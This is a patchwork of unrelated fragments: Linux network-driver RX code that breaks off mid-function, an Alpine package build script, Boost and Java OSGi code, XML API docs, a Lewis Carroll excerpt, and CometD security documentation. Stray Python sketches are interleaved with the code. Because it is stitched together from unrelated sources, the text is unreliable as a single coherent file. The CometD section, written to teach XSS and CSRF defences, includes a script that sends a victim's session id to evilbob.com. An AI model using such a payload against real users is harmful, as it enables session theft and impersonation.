#include <linux/udp.h>
#include <linux/prefetch.h>
#include <linux/moduleparam.h>
#include <linux/iommu.h>
#include <net/ip.h>
#include <net/checksum.h>
#include "net_driver.h"
#include "efx.h"
#include "filter.h"
#include "nic.h"
#include "selftest.h"
#include "workarounds.h"
/* Preferred number of descriptors to fill at once */
#define EFX_RX_PREFERRED_BATCH 8U
/* Number of RX buffers to recycle pages for. When creating the RX page recycle
* ring, this number is divided by the number of buffers per page to calculate
* the number of pages to store in the RX page recycle ring.
*/
#define EFX_RECYCLE_RING_SIZE_IOMMU 4096
#define EFX_RECYCLE_RING_SIZE_NOIOMMU (2 * EFX_RX_PREFERRED_BATCH)
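/* Illustrative example (not from the original source): with 2 buffers per
 * page, the IOMMU case recycles 4096 / 2 = 2048 pages, while the no-IOMMU
 * case recycles (2 * 8) / 2 = 8 pages.
 */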
/* Size of buffer allocated for skb header area. */
#define EFX_SKB_HEADERS 128u
/* This is the percentage fill level below which new RX descriptors
* will be added to the RX descriptor ring.
*/
static unsigned int rx_refill_threshold;
/* Each packet can consume up to ceil(max_frame_len / buffer_size) buffers */
#define EFX_RX_MAX_FRAGS DIV_ROUND_UP(EFX_MAX_FRAME_LEN(EFX_MAX_MTU), \
EFX_RX_USR_BUF_SIZE)
/*
* RX maximum head room required.
*
* This must be at least 1 to prevent overflow, plus one packet-worth
* to allow pipelined receives.
*/
#define EFX_RXD_HEAD_ROOM (1 + EFX_RX_MAX_FRAGS)
static inline u8 *efx_rx_buf_va(struct efx_rx_buffer *buf)
{
return page_address(buf->page) + buf->page_offset;
}
static inline u32 efx_rx_buf_hash(struct efx_nic *efx, const u8 *eh)
{
#if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS)
return __le32_to_cpup((const __le32 *)(eh + efx->rx_packet_hash_offset));
#else
const u8 *data = eh + efx->rx_packet_hash_offset;
return (u32)data[0] |
(u32)data[1] << 8 |
(u32)data[2] << 16 |
(u32)data[3] << 24;
#endif
}
static inline struct efx_rx_buffer *
efx_rx_buf_next(struct efx_rx_queue *rx_queue, struct efx_rx_buffer *rx_buf)
{
if (unlikely(rx_buf == efx_rx_buffer(rx_queue, rx_queue->ptr_mask)))
return efx_rx_buffer(rx_queue, 0);
else
return rx_buf + 1;
}
static inline void efx_sync_rx_buffer(struct efx_nic *efx,
struct efx_rx_buffer *rx_buf,
unsigned int len)
{
dma_sync_single_for_cpu(&efx->pci_dev->dev, rx_buf->dma_addr, len,
DMA_FROM_DEVICE);
}
void efx_rx_config_page_split(struct efx_nic *efx)
{
efx->rx_page_buf_step = ALIGN(efx->rx_dma_len + efx->rx_ip_align,
EFX_RX_BUF_ALIGNMENT);
efx->rx_bufs_per_page = efx->rx_buffer_order ? 1 :
((PAGE_SIZE - sizeof(struct efx_rx_page_state)) /
efx->rx_page_buf_step);
efx->rx_buffer_truesize = (PAGE_SIZE << efx->rx_buffer_order) /
efx->rx_bufs_per_page;
efx->rx_pages_per_batch = DIV_ROUND_UP(EFX_RX_PREFERRED_BATCH,
efx->rx_bufs_per_page);
}
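A sketch of the page-split arithmetic performed by `efx_rx_config_page_split` above. The `PAGE_SIZE` and state-header size below are assumed values for illustration, not the real kernel constants:

```python
PAGE_SIZE = 4096   # assumed 4 KiB pages
STATE_SIZE = 64    # assumed room for struct efx_rx_page_state

def bufs_per_page(buf_step: int, buffer_order: int = 0) -> int:
    # Higher-order allocations carry a single buffer; order-0 pages are
    # split into as many buffer steps as fit after the page-state header.
    if buffer_order:
        return 1
    return (PAGE_SIZE - STATE_SIZE) // buf_step

bufs = bufs_per_page(1920)  # with these numbers, 2 buffers per page
```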
/* Check the RX page recycle ring for a page that can be reused. */
static struct page *efx_reuse_page(struct efx_rx_queue *rx_queue)
{
struct efx_nic *efx = rx_queue->efx;
struct page *page;
struct efx_rx_page_state *state;
unsigned index;
index = rx_queue->page_remove & rx_queue->page_ptr_mask;
page = rx_queue->page_ring[index];
if (page == NULL)
return NULL;
rx_queue->page_ring[index] = NULL;
/* page_remove cannot exceed page_add. */
if (rx_queue->page_remove != rx_queue->page_add)
++rx_queue->page_remove;
/* If page_count is 1 then we hold the only reference to this page. */
if (page_count(page) == 1) {
++rx_queue->page_recycle_count;
return page;
} else {
state = page_address(page);
dma_unmap_page(&efx->pci_dev->dev, state->dma_addr,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
put_page(page);
++rx_queue->page_recycle_failed;
}
return NULL;
}
/**
 * efx_init_rx_buffers - create EFX_RX_PREFERRED_BATCH page-based RX buffers
*
* @rx_queue: Efx RX queue
*
* This allocates a batch of pages, maps them for DMA, and populates
* struct efx_rx_buffers for each one. Return a negative error code or
* 0 on success. If a single page can be used for multiple buffers,
* then the page will either be inserted fully, or not at all.
*/
static int efx_init_rx_buffers(struct efx_rx_queue *rx_queue, bool atomic)
{
struct efx_nic *efx = rx_queue->efx;
struct efx_rx_buffer *rx_buf;
struct page *page;
unsigned int page_offset;
struct efx_rx_page_state *state;
dma_addr_t dma_addr;
unsigned index, count;
count = 0;
do {
page = efx_reuse_page(rx_queue);
if (page == NULL) {
page = alloc_pages(__GFP_COLD | __GFP_COMP |
(atomic ? GFP_ATOMIC : GFP_KERNEL),
efx->rx_buffer_order);
if (unlikely(page == NULL))
return -ENOMEM;
dma_addr =
dma_map_page(&efx->pci_dev->dev, page, 0,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
if (unlikely(dma_mapping_error(&efx->pci_dev->dev,
dma_addr))) {
__free_pages(page, efx->rx_buffer_order);
return -EIO;
}
state = page_address(page);
state->dma_addr = dma_addr;
# Contributor: Oleg Titov <oleg.titov@gmail.com>
# Maintainer: Oleg Titov <oleg.titov@gmail.com>
pkgname=py3-catalogue
pkgver=2.0.1
pkgrel=0
pkgdesc="Super lightweight function registries for your library"
url="https://github.com/explosion/catalogue"
arch="noarch"
license="MIT"
depends="py3-importlib-metadata"
makedepends="py3-setuptools"
checkdepends="py3-pytest"
subpackages="$pkgname-doc"
source="$pkgname-$pkgver.tar.gz::https://github.com/explosion/catalogue/archive/v$pkgver.tar.gz"
builddir=$srcdir/catalogue-$pkgver
build() {
python3 setup.py build
}
check() {
pytest-3 catalogue/tests/test_catalogue.py
}
package() {
python3 setup.py install --prefix=/usr --root="$pkgdir"
install -Dm644 README.md "$pkgdir/usr/share/doc/$pkgname/README.md"
}
sha512sums="a0fd0dcccbd8dfa2662b058882118c73b5d1afbbadda9a03d21212b7c75dc79d78432d31a1922523491aad092af20463ce1bbfb3cd286d95bab367cb2f67ed55 py3-catalogue-2.0.1.tar.gz"
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
{
"f1": (SELECT value BITCLEAR(6, 1))[0],
"f2": (SELECT value BITCLEAR(6, [1, 2]))[0],
"f3": (SELECT value BITCLEAR(31, [1, 2, 4, 5]))[0],
"f4": (SELECT value BITCLEAR(int8("31"), [int16("1"), float("2"), double("4"), 5]))[0]
};
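A sketch of the bit-clearing semantics these expressions assume: positions are 1-based, with position 1 being the least significant bit. The helper name and semantics below are an assumption about the `BITCLEAR` builtin, not taken from its documentation:

```python
def bitclear(value: int, positions) -> int:
    # Clear the given 1-based bit positions (assumed semantics of the
    # BITCLEAR builtin above; position 1 is the least significant bit).
    if not isinstance(positions, (list, tuple)):
        positions = [positions]
    for p in positions:
        value &= ~(1 << (int(p) - 1))
    return value
```

Under this reading, `BITCLEAR(6, 1)` leaves 6 unchanged (bit 1 is already 0), while `BITCLEAR(6, [1, 2])` yields 4.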
# will_pop_scope_demo
A demo that detects whether a page has been popped.
Featured in MTechViral's YouTube video: https://www.youtube.com/watch?v=fYBCzgBRkb4&list=PLR2qQy0Zxs_Wot7YfLeeKdMlJ9838C_w0&index=2
## Samples


## Getting Started
For help getting started with Flutter, view our online
[documentation](https://flutter.io/).
using System.Collections.Generic;
using Volo.Abp.AspNetCore.Mvc.UI.Bundling;
namespace Volo.CmsKit.Public.Web.Pages.CmsKit.Shared.Components.ReactionSelection
{
public class ReactionSelectionStyleBundleContributor : BundleContributor
{
public override void ConfigureBundle(BundleConfigurationContext context)
{
context.Files.AddIfNotContains("/Pages/CmsKit/Shared/Components/ReactionSelection/default.css");
}
}
}
'Go on with the next verse,' the Gryphon repeated impatiently: 'it
begins "I passed by his garden."'
Alice did not dare to disobey, though she felt sure it would all come
wrong, and she went on in a trembling voice:--
<?xml version="1.0"?>
<doc xml:lang="en">
<assembly>
<name>Microsoft.AI.WindowsServer</name>
</assembly>
<members>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer">
<summary>
A telemetry initializer that will gather Azure Web App Role Environment context information.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppNameEnvironmentVariable">
<summary>Azure Web App name corresponding to the resource name.</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppHostNameEnvironmentVariable">
      <summary>Azure Web App Hostname. This will include the deployment slot, but will be the same across instances of the same slot.</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer">
<summary>
A telemetry initializer that will gather Azure Role Environment context information.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer">
<summary>
A telemetry context initializer that will set component context version on the base of BuildInfo.config information.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.version">
<summary>
The version for this component.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes version of the telemetry item with the version obtained from build info if it is available.
</summary>
<param name="telemetry">The telemetry context to initialize.</param>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.LoadBuildInfoConfig">
<summary>
Loads BuildInfo.config and returns XElement.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.GetVersion">
<summary>
Gets the version for the current application. If the version cannot be found, we will return the passed in default.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule">
<summary>
      Telemetry module that sets developer mode to true when it is not already set AND a managed debugger is attached.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.IsDebuggerAttached">
<summary>
Function that checks whether debugger is attached with implementation that can be replaced by unit test code.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)">
<summary>
Gives the opportunity for this telemetry module to initialize configuration object that is passed to it.
</summary>
<param name="configuration">Configuration object.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer">
<summary>
A telemetry context initializer that will gather device context information.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Populates device properties on a telemetry item.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer">
<summary>
Obsolete. A telemetry context initializer that used to populate role instance name. Preserved for backward compatibility.
Note that role instance will still be populated with the machine name as in the previous versions.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Obsolete method.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.instance">
<summary>
The singleton instance for our reader.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleName">
<summary>
The Azure role name (if any).
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleInstanceName">
<summary>
The Azure role instance name (if any).
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader"/> class.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Instance">
<summary>
Gets or sets the singleton instance for our application context reader.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.BaseDirectory">
<summary>
      Gets or sets the base directory where the hunt for application DLLs is to start.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Initialize">
<summary>
Initializes the current reader with respect to its environment.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleName">
<summary>
Gets the Azure role name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleInstanceName">
<summary>
Gets the Azure role instance name.
      </summary>
/*
* Copyright 2011 Harald Wellmann.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied.
*
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.wicketstuff.osgi.util;
import java.util.Map;
import java.util.Map.Entry;
import org.apache.wicket.WicketRuntimeException;
import org.osgi.framework.BundleContext;
import org.osgi.framework.Filter;
import org.osgi.framework.FrameworkUtil;
import org.osgi.framework.InvalidSyntaxException;
import org.osgi.util.tracker.ServiceTracker;
/**
* A utility class for looking up services from the OSGi registry. The methods of this class wait
* for the service for a given timeout (default 10 seconds) and throw a
* {@code WicketRuntimeException} when no matching service becomes available during this period.
* <p>
* NOTE: Prefixing some method calls with our own class name is a workaround for a bug in the Oracle
* Java compiler, which does not occur when compiling in Eclipse.
*
* @author Harald Wellmann
*
*/
public class OsgiServiceLookup
{
public static final long DEFAULT_TIMEOUT = 10000;
public static <T> T getOsgiService(BundleContext bc, String className)
{
return OsgiServiceLookup.<T> getOsgiService(bc, className, DEFAULT_TIMEOUT, null);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type)
{
return getOsgiService(bc, type, DEFAULT_TIMEOUT);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type, Map<String, String> props)
{
return getOsgiService(bc, type, DEFAULT_TIMEOUT, props);
}
/**
* Returns a service matching the given criteria.
*
* @param <T>
* class implemented or extended by the service
* @param bc
* bundle context for accessing the OSGi registry
* @param type
* class implemented or extended by the service
* @param timeout
* maximum wait period in milliseconds
* @param props
* properties to be matched by the service
* @return matching service (not null)
* @throws WicketRuntimeException
*/
public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout,
Map<String, String> props)
{
return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, props);
}
public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout)
{
return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, null);
}
@SuppressWarnings("unchecked")
public static <T> T getOsgiService(BundleContext bc, String className, long timeout,
Map<String, String> props)
{
ServiceTracker tracker = createServiceTracker(bc, className, props);
try
{
tracker.open();
Object svc = tracker.waitForService(timeout);
if (svc == null)
{
throw new WicketRuntimeException("gave up waiting for service " + className);
}
return (T)svc;
}
catch (InterruptedException exc)
{
throw new WicketRuntimeException(exc);
}
finally
{
tracker.close();
}
}
private static ServiceTracker createServiceTracker(BundleContext bc, String className,
Map<String, String> props)
{
if (props == null || props.isEmpty())
{
return new ServiceTracker(bc, className, null);
}
StringBuilder builder = new StringBuilder("(&(objectClass=");
builder.append(className);
builder.append(')');
for (Entry<String, String> entry : props.entrySet())
{
builder.append('(');
builder.append(entry.getKey());
builder.append('=');
builder.append(entry.getValue());
builder.append(')');
}
builder.append(')');
try
{
Filter filter;
filter = FrameworkUtil.createFilter(builder.toString());
ServiceTracker tracker = new ServiceTracker(bc, filter, null);
return tracker;
}
catch (InvalidSyntaxException exc)
{
throw new WicketRuntimeException(exc);
}
}
}
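The filter string assembled by `createServiceTracker` above is a standard LDAP-style conjunction. A sketch of the same string-building (illustrative only; it covers the non-empty-properties branch — for empty properties the Java code skips the filter and tracks by class name directly):

```python
def osgi_filter(class_name: str, props: dict) -> str:
    # Mirrors the StringBuilder logic in createServiceTracker:
    # (&(objectClass=<class>)(key1=value1)(key2=value2)...)
    clauses = "".join(f"({k}={v})" for k, v in props.items())
    return f"(&(objectClass={class_name}){clauses})"
```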
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==============================================================================*/
#ifndef BOOST_PP_IS_ITERATING
#if !defined(FUSION_MAKE_SET_09162005_1125)
#define FUSION_MAKE_SET_09162005_1125
#include <boost/preprocessor/iterate.hpp>
#include <boost/preprocessor/repetition/enum_params.hpp>
#include <boost/preprocessor/repetition/enum_binary_params.hpp>
#include <boost/preprocessor/repetition/enum_params_with_a_default.hpp>
#include <boost/preprocessor/repetition/repeat_from_to.hpp>
#include <boost/fusion/support/config.hpp>
#include <boost/fusion/container/set/set.hpp>
#include <boost/fusion/support/detail/as_fusion_element.hpp>
#include <boost/fusion/support/pair.hpp>
#if !defined(BOOST_FUSION_DONT_USE_PREPROCESSED_FILES)
#include <boost/fusion/container/generation/detail/preprocessed/make_set.hpp>
#else
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#pragma wave option(preserve: 2, line: 0, output: "preprocessed/make_set" FUSION_MAX_SET_SIZE_STR".hpp")
#endif
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
This is an auto-generated file. Do not edit!
==============================================================================*/
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#pragma wave option(preserve: 1)
#define FUSION_HASH #
#endif
namespace boost { namespace fusion
{
struct void_;
namespace result_of
{
template <
BOOST_PP_ENUM_PARAMS_WITH_A_DEFAULT(
FUSION_MAX_VECTOR_SIZE, typename T, void_)
, typename Extra = void_
>
struct make_set;
template <>
struct make_set<>
{
typedef set<> type;
};
}
// XXX:
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
FUSION_HASH if defined(BOOST_CLANG)
BOOST_CXX14_CONSTEXPR
FUSION_HASH else
BOOST_CONSTEXPR
FUSION_HASH endif
#else
#if defined(BOOST_CLANG)
BOOST_CXX14_CONSTEXPR
#else
BOOST_CONSTEXPR
#endif
#endif
BOOST_FUSION_GPU_ENABLED
inline set<>
make_set()
{
return set<>();
}
#define BOOST_FUSION_AS_FUSION_ELEMENT(z, n, data) \
typename detail::as_fusion_element<BOOST_PP_CAT(T, n)>::type
#define BOOST_PP_FILENAME_1 <boost/fusion/container/generation/detail/pp_make_set.hpp>
#define BOOST_PP_ITERATION_LIMITS (1, FUSION_MAX_VECTOR_SIZE)
#include BOOST_PP_ITERATE()
#undef BOOST_FUSION_AS_FUSION_ELEMENT
}}
#if defined(__WAVE__) && defined(BOOST_FUSION_CREATE_PREPROCESSED_FILES)
#undef FUSION_HASH
#pragma wave option(output: null)
#endif
#endif // BOOST_FUSION_DONT_USE_PREPROCESSED_FILES
#endif
#else // defined(BOOST_PP_IS_ITERATING)
///////////////////////////////////////////////////////////////////////////////
//
// Preprocessor vertical repetition code
//
///////////////////////////////////////////////////////////////////////////////
#define N BOOST_PP_ITERATION()
namespace result_of
{
template <BOOST_PP_ENUM_PARAMS(N, typename T)>
#define TEXT(z, n, text) , text
struct make_set< BOOST_PP_ENUM_PARAMS(N, T) BOOST_PP_REPEAT_FROM_TO(BOOST_PP_DEC(N), FUSION_MAX_SET_SIZE, TEXT, void_) >
#undef TEXT
{
typedef set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)> type;
};
}
template <BOOST_PP_ENUM_PARAMS(N, typename T)>
BOOST_CONSTEXPR BOOST_FUSION_GPU_ENABLED
inline set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>
make_set(BOOST_PP_ENUM_BINARY_PARAMS(N, T, const& arg))
{
return set<BOOST_PP_ENUM(N, BOOST_FUSION_AS_FUSION_ELEMENT, _)>(
BOOST_PP_ENUM_PARAMS(N, arg));
}
#undef N
#endif // defined(BOOST_PP_IS_ITERATING)
[[_security]]
== Security
This section discusses the security features of the Bayeux Protocol, how they
relate to common attacks, and how you can configure CometD to tighten your
application's security.
=== Security of the CometD session id
The Bayeux Protocol identifies a particular session (formerly known as "client")
via a session id token, carried in Bayeux messages by the `clientId` field.
The `clientId` field value (i.e. the session id) is generated by the server
when the client sends the handshake request message, and sent back to the
client in the handshake response message (see
xref:_bayeux_meta_handshake[the Bayeux Protocol handshake]).
The client then sends the `clientId` field in every subsequent message to the
server, until disconnection.
The session id is generated using a strong random number generator, and as
such it is not guessable by an evil third party.
An evil user that knows its own session id cannot guess the session id of
another user by just looking at its own session id.
While the non-guessability of the session id is a good starting point, it
is typically not enough, so read on.
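The non-guessability property described above comes from drawing the id from a cryptographically strong random source. A minimal sketch of such generation (illustrative only, not CometD's actual implementation):

```python
import secrets

def new_session_id(nbytes: int = 20) -> str:
    # token_urlsafe draws from the OS CSPRNG, so observing one user's
    # session id reveals nothing about another user's session id.
    return secrets.token_urlsafe(nbytes)

a = new_session_id()
b = new_session_id()
```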
=== Security against man-in-the-middle attacks
An evil user may be in the position to observe Bayeux Protocol traffic, as
it is the case for a man-in-the-middle.
The typical solution in this case is to encrypt the traffic between the
client and the server using TLS.
In this way, all the traffic between the client and the server is
encrypted end-to-end and a man-in-the-middle cannot look or otherwise retrieve
someone else's session id.
[[_security_xss]]
=== Security against Cross-Site Scripting (XSS) attacks
A https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)[cross-site scripting attack]
is a particularly important vulnerability of web applications.
A typical example of XSS is the following:
Evil user Bob connects to a chat service that uses CometD.
There, he finds Alice, another user.
Bob sends an evil chat message text to Alice where the text is the following:
====
[source,html]
----
<script type="text/javascript">
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://evilbob.com?stolen=" + $.cometd.getClientId());
xhr.send();
</script>
----
====
As you can see, the script accesses the CometD's session id (via
`$.cometd.getClientId()`).
[NOTE]
====
Removing the method `getClientId()` would not solve the issue, because
the evil script could access the session id in other ways.
For example, by registering an extension, or by otherwise watching
Bayeux messages that come and go for the normal functioning of the
application, or by quickly disconnecting and reconnecting the session, etc.
====
Bob sends that evil message, which reaches the CometD server and gets routed
to Alice. When it arrives on Alice's browser, that script may be run by
the browser if the application is XSS vulnerable.
If the script runs, Bob would be able to steal Alice's session id, send
it to his server `evilbob.com`, where Bob would be able to access it.
[IMPORTANT]
====
If your web application is XSS vulnerable, an attacker can do
a lot more damage than just stealing a CometD session id, so it is of
paramount importance that your web application sanitizes data received
from unknown sources such as other users chat messages.
====
If Bob has stolen Alice's session id, he could craft a Bayeux message
with Alice's session id and send it from his computer, and thereby could
impersonate Alice.
CometD protects from impersonations due to stolen session ids in different
ways, depending on the type of transport used to carry Bayeux messages.
For transports based on HTTP (`long-polling` and `callback-polling`),
CometD sends an HTTP cookie with the handshake response, marked as `HttpOnly`,
called `BAYEUX_BROWSER` (see xref:_java_server_configuration[]).
The CometD implementation, on the server, maps this cookie to a legit
session id during the processing of the handshake request message.
For every subsequent message, the browser will send the `BAYEUX_BROWSER`
cookie to the server and the CometD implementation will
retrieve the session id from legit sessions that have been mapped to the
cookie, rather than from the message (where it could have been altered).
Bob could craft a message with Alice's session id, but the `BAYEUX_BROWSER`
cookie that he will send along with the tampered message will be his,
not Alice's. The CometD implementation will detect this attack and ask
Bob to re-handshake.
If the crafted message does not have any cookie, CometD will ask Bob to
re-handshake.
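The cookie-to-session check just described can be sketched as follows. The data structure and names here are hypothetical, not CometD's internals:

```python
from typing import Optional

# Populated at handshake time: BAYEUX_BROWSER cookie value -> the set of
# session ids that were handshaken from that browser.
sessions_by_cookie = {
    "alice-cookie": {"alice-session"},
    "bob-cookie": {"bob-session"},
}

def accept_message(cookie: Optional[str], client_id: str) -> bool:
    # A message is trusted only if its clientId was handshaken under the
    # same BAYEUX_BROWSER cookie; otherwise the client must re-handshake.
    if cookie is None:
        return False
    return client_id in sessions_by_cookie.get(cookie, set())
```

With this check, Bob sending Alice's stolen session id along with his own cookie is detected and rejected.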
For transports based on WebSocket (`websocket`), CometD trusts the particular
connection that has been established during the handshake.
The session id is associated with that connection; when a WebSocket message
arrives on that connection, CometD retrieves the session id from the
association with the connection, rather than from the message (where it
could have been altered).
When the connection is closed, for example for a network failure, CometD
attempts to open another connection.
If the reconnection happens within a short period of time (typically less than
the `maxInterval` configured on the server), then CometD will try to send
messages on the new connection without re-handshaking, but since it's a new
connection that did not process a handshake message, it will not have a
session id associated.
At this point, CometD could ask the client to re-handshake (which involves
some round-trips to be completed, possibly slowing further down the
communication in case of faulty networks), or it could trust the session
id from the message (which would yield faster reconnections, albeit less
secure if the session id is stolen).
This is controlled by the `requireHandshakePerConnection` parameter, see
xref:_java_server_configuration[].
[[_security_csrf]]
=== Security against Cross Site Request Forgery (CSRF) attacks
A https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)[cross site request forgery attack]
is a particularly important vulnerability of web applications.
A typical example of CSRF is the following:
Evil user Bob connects to the chat service at `cometd-chat.com` using CometD. There,
he finds Alice, another user. Bob sends an evil chat message text to Alice where the
text is the following:
====
[source,html]
----
Look at this: https://evilbob.com/cometd
----
====
Alice clicks on the link, her browser opens a new tab to `+https://evilbob.com/cometd+`
and an entertaining HTML page containing a script is downloaded to Alice's browser.
While Alice is looking at Bob's entertaining page, her browser runs an evil script,
which may perform actions on behalf of Alice on the chat service that uses CometD.
For example, Bob could use xref:_security_xss[XSS] to steal Alice's session id and
then craft and send evil messages to the chat service _from Alice's browser_.
Alice's browser will send the existing Alice's `BAYEUX_BROWSER` cookie along with
the evil messages, and to the server the evil messages will be indistinguishable
from legit messages sent by Alice, because they will carry her `BAYEUX_BROWSER`
cookie and her stolen session id.
CometD does not automatically protect against CSRF attacks, but they are easily
countered by configuring the cross-origin filter as explained in
xref:_java_server_configuration_advanced[this section].
Alice's legit messages are sent by a script downloaded from the chat service, and
therefore will have the following HTTP header:
====
[source]
----
Origin: https://cometd-chat.com
----
====
Conversely, Bob's evil script is downloaded from `+https://evilbob.com+` and his
evil messages will have the following HTTP header:
====
[source]
----
Origin: https://evilbob.com
----
====
The application at `cometd-chat.com` can install the cross-origin filter and
configure it to allow requests only from the `cometd-chat.com` origin,
effectively blocking Bob's CSRF attack.
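The effect of that configuration can be sketched as an allowlist check on the `Origin` header (names illustrative; the real cross-origin filter does more than this):

```python
ALLOWED_ORIGINS = {"https://cometd-chat.com"}  # the application's own origin

def origin_allowed(headers: dict) -> bool:
    # Requests whose Origin header is missing or not on the allowlist
    # are rejected before they reach the Bayeux endpoint.
    return headers.get("Origin") in ALLOWED_ORIGINS
```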
